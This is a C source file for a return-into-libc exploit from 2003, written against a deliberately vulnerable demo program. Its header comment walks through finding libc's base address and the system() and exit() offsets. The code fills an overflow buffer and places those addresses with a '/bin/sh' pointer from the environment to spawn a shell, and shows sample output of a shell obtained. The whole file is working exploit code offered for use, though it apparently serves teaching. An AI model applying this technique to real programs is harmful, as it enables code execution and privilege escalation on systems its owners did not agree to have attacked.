/*
 * $Id: retlibc1-ex.c,v 1.1.1.1 2004/05/29 14:15:05 raptor Exp $
 *
 * retlibc1-ex.c - retlibc1.c exploit (return-into-libc)
 * Copyright (c) 2003 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This exploit shows the basic return-into-libc technique, changing the 
 * execution flow of an abo1.c-like vulnerable program.
 *
 * Tested on Linux 2.4.20-rc4 with gcc-2.95.4. For newer compilers, you 
 * probably have to use a bigger buffer and pad A's to (67 * 4) = 268.
 *
 * First, grab the base memory address where libc are mapped:
 * $ ldd retlibc1
 * 	libc.so.6 => /lib/libc.so.6 (0x4001a000)
 *                                   ^^^^^^^^^^\__(LIBBASE address)
 * 	[...]
 *
 * Then grab the offsets of the functions we need from libc:
 * $ readelf -a /lib/libc.so.6 | grep " system@"
 *    502: 00045590   730 FUNC    WEAK   DEFAULT   11 system@@GLIBC_2.0
 *         ^^^^^^^^\__(this is the system() offset in libc)
 * $ readelf -a /lib/libc.so.6 | grep " exit@"
 *   1781: 0002bdc0   248 FUNC    GLOBAL DEFAULT   11 exit@@GLIBC_2.0
 *         ^^^^^^^^\__(this is the exit() offset in libc)
 *
 * $ ./retlibc1-ex 
 * Using system() address: 0x4005f590
 * Using exit() address: 0x40045dc0
 * Using /bin/sh address: 0xbfffffe9
 * sh-2.05a$ 
 *
 * NOTE: in this example we provided a "/bin/sh" null-terminated string in env.
 * It's also possible to use the address of any "/bin/sh" occurrences in libc.
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define BUF	273			// (65 * 4) + (4 * 3) + 1
#define LIBBASE	0x4001a000		// base address of libc mapping
#define SYSTEM	(LIBBASE + 0x00045590)	// system() address in libc
#define EXIT	(LIBBASE + 0x0002bdc0)	// exit() address in libc
#define	SHELL	"/bin/sh"		// the "/bin/sh" string

int main()
{
	char *env[2] = {SHELL, NULL};
	char buf[BUF];

	int *p = (int *)buf;
	int shell = 0xbffffffa - strlen(SHELL) - strlen("./retlibc1");

	fprintf(stderr, "Using system() address: %p\n", SYSTEM);
	fprintf(stderr, "Using exit() address: %p\n", EXIT);
	fprintf(stderr, "Using /bin/sh address: %p\n", shell);

	/* fill the first part of the buffer */
	memset(buf, 'A', BUF);
	p += 65;

	/* prepare the stack */
	*p++ = SYSTEM;	/* system() address in libc */
	*p++ = EXIT;	/* exit() address in libc */
	*p++ = shell;	/* "/bin/sh" address in env */
	*p = 0x0;

	/* run the vulnerable program */
	execle("./retlibc1", "retlibc1", buf, NULL, env);
	perror("execle");
}
